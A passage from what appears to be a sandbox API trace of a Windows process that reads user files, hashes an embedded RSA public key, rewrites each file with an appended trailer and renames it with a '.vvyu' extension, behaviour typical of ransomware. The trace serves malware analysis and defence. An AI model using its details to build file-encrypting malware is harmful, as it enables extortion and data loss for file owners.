lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f9c0 | out: hHeap=0x620000) returned 1 [0200.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.480] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x175a1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x175a1, lpOverlapped=0x0) returned 1 [0200.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.481] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x175a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.481] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.483] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.483] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.483] CloseHandle (hObject=0x510) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0200.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0200.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0200.486] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\1OTdzHn.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\1otdzhn.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\1OTdzHn.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\1otdzhn.jpg.vvyu")) returned 1 [0200.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.487] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.490] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2db9590, ftCreationTime.dwHighDateTime=0x1d8a0a4, ftLastAccessTime.dwLowDateTime=0xbce2f90, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0xbce2f90, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0xe545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9zmN.mp3", cAlternateFileName="")) returned 1 [0200.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.491] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\9zmN.mp3") returned=".mp3" [0200.491] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\9zmN.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\9zmn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.492] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=58693) returned 1 [0200.492] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.494] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xe51f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.495] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.497] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.497] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xe545, lpOverlapped=0x0) returned 1 [0200.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.498] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.499] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.499] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.499] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.499] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.499] GetLastError () returned 0x0 [0200.499] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.499] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.500] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.500] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.500] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe550) returned 0x2ea99b0 [0200.501] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f9c0 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa08 [0200.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.502] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3338 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.505] GetCurrentThreadId () returned 0x66c [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8088 [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.506] GetCurrentThreadId () returned 0x66c [0200.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0200.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.514] HeapFree (in: 